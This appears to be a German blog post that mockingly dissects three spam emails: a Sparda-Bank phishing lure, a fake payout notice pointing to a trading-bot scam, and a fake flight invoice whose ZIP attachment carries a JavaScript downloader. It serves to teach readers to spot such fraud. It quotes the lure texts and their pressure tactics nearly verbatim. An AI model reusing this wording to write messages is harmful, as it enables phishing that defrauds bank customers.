  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Sparda Bank – Aktueller Sicherheitshinweis

Samstag, 28. Mai 2016

Aber ich bin da doch gar nicht. Ach, ist ja auch eine Spam.

Lange kein Phishing mehr gehabt.

Sparda Bank – Aktueller Sicherheitshinweis

Das steht doch schon im Betreff.

Sehr geehrter Kunde, Grüße von Ihrer Sparda-Bank!

Genau mein Name!

Spätestens an dieser Stelle sollte jeder bemerken, dass es sich um eine Spam handelt. Eine echte E-Mail der Sparda-Bank würde nämlich immer…

  1. …den Kunden persönlich und namentlich ansprechen; und
  2. …möglichst früh im Text angeben, auf welchen Vertrag oder welches Konto sich die E-Mail bezieht, denn viele Kunden haben mehrere Konten oder laufende Darlehen oder dergleichen.

Nur kann sich der Spammer halt keine Kontonummer ausdenken, die bei jedem Empfänger passt. Aber „sehr geehrter Kunde“ passt immer.

Wir haben festgestellt, dass Sie Ihre persönlichen Daten bis heute nicht bestätigt haben.

Aha, darum geht es also in einem „aktuellen Sicherheitshinweis“. Und ich dachte schon, da steht drin, dass die Geldautomaten heute im Jackpot-Modus laufen und dass man eventuell überschüssige ausgegebene Banknoten doch bitte zur Filiale bringen soll, um riesige Geldverluste bei der Bank seines Vertrauens zu vermeiden. ;)

Aber das Beste an diesem Phishing-Trick ist: Wie, jetzt erst wollen die meine Daten? Nicht schon, als ich angeblich Kunde geworden bin? Haben die mir einfach Geld gegeben, ohne sich ein Ausweisdokument von mir zeigen zu lassen?

Diese Phisher denken sich doch immer wieder so richtig extratolle Gründe aus, um Leute dazu zu bringen, dass sie ihr Konto Kriminellen zur Verfügung stellen.

Tatsächlich hat es aber für die Sicherheit überhaupt keinen Wert, wenn man gegenüber einer Bank (oder sonstigen Unternehmung) lauter Daten noch einmal angibt, die der Bank (oder sonstigen Unternehmung) längst bekannt sind. Die einzigen, die an solchen Angaben Interesse haben können und die deshalb solche Angaben einfordern, sind gewerbsmäßig agierende Betrüger, die sich für die Datenakquise als Bank (oder sonstige Unternehmung) ausgeben, um danach mit dem Geld anderer Leute mal so richtig groß einkaufen zu gehen.

Um Ihnen weiterhin einen sicheren Service anbieten zu können, ist die Bestätigung Ihrer persönlichen Daten notwendig. Ihr Nutzerkonto wurde temporär gesperrt.

Wie bitte? Was hat die Korrektmeit „meiner persönlichen Daten“ mit der Sicherheit der Dienstleistung einer Bank zu tun? Die hätte auch sicher zu sein, wenn ich nur als Daisy Duck aus Entenhausen bekannt wäre.

Nach Abschluss der Bestätigung wird Ihr Nutzerkonto automatisch freigeschaltet.
Die Bestätigung können Sie über den unten ausgeführten Button starten.

Die gleichen Leute, die im vorigen Absatz von „Sicherheit“ gefaselt haben, erzählen jetzt, dass ich die „Sicherheit“ durch einen Klick in eine nicht digital signierte E-Mail herstellen kann, wie sie mir jeder der potenziell acht Milliarden Internetteilnehmer zusenden könnte. Das sind Spezialexperten für Sicherheit! Und damit wirklich ein paar Naive so dumm sind, dass sie darauf reinfallen…

Kommen Sie dieser E-Mail innerhalb 14 Tagen nicht nach, ist die Freischaltung nur über den Postweg möglich. Dabei wird eine Bearbeitungsgebühr in Höhe von 79,95€ fällig, welche wir anschließend von Ihrem Konto abbuchen werden.

…werden in ein paar Tagen angeblich grundlos achtzig Euro fällig, weil man auf eine E-Mail nicht reagiert – was ja auch daran liegen könnte, dass die Zustellung gescheitert ist, dass die E-Mail als Spam aussortiert wurde oder dass sie an eine wegen Spamverseuchung nicht mehr aktiv genutzte E-Mail-Adresse geht. Deshalb kommen derartige Fristsetzungen aus Gründen der Rechtssicherheit ja auch nicht über E-Mail, sondern immer mit der Sackpost.

Jetzt anmelden

Der Link führt natürlich nicht zur Website der Sparda-Bank, sondern zum Server mit der IP-Adresse 190.123.45.36 (nein, es wird im Link keine Domain verwendet), der im sonnigen Panama gehostet ist. Alles, was man dort an Daten eingibt, geht direkt an Verbrecher.

Immerhin hat der Hoster schnell auf die Abuse-Mail reagiert. Der von den Phishern angemietete Server ist bereits vom Netz. Vermutlich wird jetzt ein anderer Server irgendwo auf der Welt verwendet.

Wir bitten Sie die Umstände zu entschuldigen und bedanken uns bei Ihnen für Ihr Verständnis.

Oh, so ein pseudohöflicher Dank nach einer unverschämten Belästigung ist genau das, was in mir immer das akute Bedürfnis nach negativem sozialen Feedback in Form eines eingeschlagenen Fressbrettes auslöst. Leider hat der Idiot von Spammer dieses kleine Juwel der Kundenverachtung aus echten Texten echter Unternehmungen abgeschrieben – ich durfte derartige Unverschämtheiten jedenfalls immer wieder einmal lesen. Bei jemanden, der kein Masochist ist, sollten derartige Phrasen nur dazu führen, dass man Verträge so schnell wie möglich (und im Zweifelsfall unter Vorwand) kündigt und derart kundenverachtende Klitschen mit ihrer Arschlochsprache fortan vollständig meidet.

Mit freundlichen Grüßen
Ihre Sparda Bank

Mit intelligenzverachtenden Grüßen
Dein Phishing-Spammer

Diese Spam ist ein Zustecksel meines Lesers M.S.

Auszahlungsbestätigung für gammelfleisch@tamagothi.de (Bitte Jetzt Bestätigen!)

Donnerstag, 5. Mai 2016

Hallo gammelfleisch@tamagothi.de!

Das ist ja genau mein Name!

Sehr geehrter Kunde!

Und schon wieder mein Name! Woher kennt der Spammer den nur?! :D

Hiermit übersenden wir Ihnen Ihre Auszahlungsbestätigung für offenes Guthaben in der Höhe von:

für Ihr Benutzerkonto mit folgender E-Mail Adresse:

  • gammelfleisch@tamagothi.de

Merken wir uns: Geld wird an Mailadressen (oder an Benutzerkonten) gezahlt, nicht an Leute, die es auch ausgeben könnten.

„Kreativ“ ist hier die Verwendung der Auszeichnung für eine unsortierte Liste mit nur einem einzigen Element. Auch Dummheit kann kreativ machen.

Bitte KLICKEN SIE HIER um Ihre Auszahlung anzufordern!

Genau, das hat in der hingestümperten Spam noch gefehlt. Ein „Click here“, der dümmste Linktext, den man in eine Mail reinschreiben kann. Da kann man sich dann Geld klicken, das einem grundlos gegeben wird, weil man so eine schöne Mailadresse hat. Sehr glaubwürdig. Und wer jetzt wissen will, um was es geht…

Bei weiteren Fragen steht Ihnen der Kunden Support auf der Website zu verfügung.

…muss ebenfalls klicken. Auf einen Link, der über ein Tracking-Skript in der Domain webimpossible (punkt) com geht. Keine gute Idee, das zu tun.

Wer es sich sparen will: Es geht nach einer längeren Kaskade von Weiterleitungen dann wieder zum Sir William Bot, der alle Menschen wie von allein so richtig reich macht. Eigentlich schade, dass der Spammer den nicht selbst benutzt, sondern lieber ein paar klimprige Affilate-Groschen dafür kassiert, dass er windigen Brokern ein paar Kunden zutreibt. Warum der Reichwerdexperte seine Reichwerdmethode nicht selbst benutzt? Ach, das klärt sich durch kurzes Nachdenken.

Mit freundlichen Grüßen

Walther Marengold
VIP Customer

So so, von einem ganz very impotent wichtigem Kunden… :mrgreen:

Gesehen, gelacht, gelöscht.

Buchung/Rechnung DH80RK

Dienstag, 1. März 2016

Von: Nurflug.de <info (at) nurflug (punkt) de>

Nein, diese Spam hat niemals einen Server von nurflug (punkt) de gesehen. Sie wird über Botnetze aus kriminell übernommenen Computern versendet. Eines meiner Exemplare kam aus Bangalore, Karnataka, Indien; und ein anderes meiner Exemplare kam aus New Delhi, ebenfalls Indien. In beiden Fällen handelte es sich um dynamisch vergebene IP-Adressen, also mit an Sicherheit grenzender Wahrscheinlichkeit um Privatrechner, die mit Schadsoftware übernommen wurden. Zum Beispiel, weil ihre Besitzer Mailanhänge geöffnet haben…

Sehr geehrte/r Kundin/Kunde,

Ich bin also Kunde, aber ich habe keinen Namen.

vielen Dank für Ihre Buchung DH80RK

Ich habe also etwas gebucht, aber das hat nur eine Nummer.

In der Anlage übermitteln wir Ihnen Ihre Bestätigung/Rechnung im PDF Format.

Geld kostet es mich auch noch. Wenn ich rauskriegen will, um was zum hackenden Henker es überhaupt geht, „muss“ ich einen Anhang öffnen.

Sollten Sie das PDF Dokument nicht öffnen können, so erhalten Sie den Acrobat Reader dazu kostenlos unter www.adobe.de

Wir wünschen Ihnen eine schöne und erholsame Reise !

Ihr Reise- & Buchungsservice Team

PS: Beachten Sie bitte unsere geänderten AGBs die wir für Sie unter http://www.nurflug.de/agb/ bereitgestellt haben.

Blah! Einmal das übliche Geschwurbel, mit dem Spammer davon ablenken wollen, dass in Wirklichkeit nur das Folgende in der Spam steht: „Obwohl wir sie nicht kennen und sie von uns nur einen beliebig fälschbaren Absender kennen, seien sie doch bitte so angstblöd, dass sie nur wegen solcher Wörter wie Rechnung und Buchung ganz schnell einen Anhang aus einer E-Mail unbekannter Zeitgenossen öffnen“.

Wer hier häufiger mitliest, wird es sich schon denken können: Es ist keine Rechnung, sondern eine Schadsoftware. Der Anhang ist ein ZIP-Archiv, in dem nicht etwa ein PDF-Dokument liegt, sondern ein vorsätzlich unverständlich formuliertes Javascript-Programm für den Windows Scripting Host, das eine ausführbare Datei aus dem Internet nachlädt und ausführt. Wer das Archiv auspackt und unter Microsoft Windows einen Doppelklick auf diese Datei macht, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Diese klare Schadsoftware wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt.

Wer aber äußerste Vorsicht mit E-Mail-Anhängen übt; wer einen Anhang nur aufmacht, wenn dieser vorher (und über einen anderen Kanal als E-Mail) ausdrücklich vereinbart wurde; wer mit den typischen Maschen der Kriminellen vertraut ist; wer sich nicht von Behauptungen in Angst versetzen lässt – tja, der hat diese Spam einfach gelöscht und dem Antivirus-Schlangenöl gar nicht erst die Chance gegeben, daran zu versagen.